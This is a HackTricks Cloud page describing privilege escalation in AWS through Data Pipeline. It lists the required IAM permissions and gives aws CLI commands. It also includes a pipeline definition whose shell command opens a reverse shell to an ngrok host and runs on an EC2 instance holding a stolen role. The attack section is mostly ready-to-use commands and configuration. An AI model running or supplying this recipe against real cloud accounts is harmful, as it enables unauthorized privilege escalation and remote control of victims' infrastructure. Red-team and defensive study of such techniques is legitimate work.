AWS - Datapipeline Privesc

Reading time: 3 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

datapipeline

For more info about datapipeline check:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

Users with these permissions can escalate privileges by creating a Data Pipeline to execute arbitrary commands using the permissions of the assigned role:

bash

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:

json

{
  "objects": [
    {
      "id": "CreateDirectory",
      "type": "ShellCommandActivity",
      "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
      "runsOn": { "ref": "instance" }
    },
    {
      "id": "Default",
      "scheduleType": "ondemand",
      "failureAndRerunMode": "CASCADE",
      "name": "Default",
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_datapipeline"
    },
    {
      "id": "instance",
      "name": "instance",
      "type": "Ec2Resource",
      "actionOnTaskFailure": "terminate",
      "actionOnResourceFailure": "retryAll",
      "maximumRetries": "1",
      "instanceType": "t2.micro",
      "securityGroups": ["default"],
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_ec2_profile_instance"
    }
  ]
}

note

Note that the role in line 14, 15 and 27 needs to be a role assumable by datapipeline.amazonaws.com and the role in line 28 needs to be a role assumable by ec2.amazonaws.com with a EC2 profile instance.

Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).

bash

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
    --pipeline-definition file:///pipeline/definition.json

The pipeline definition file, crafted by the attacker, includes directives to execute commands or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.

Potential Impact: Direct privesc to the ec2 service role specified.

References

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

tip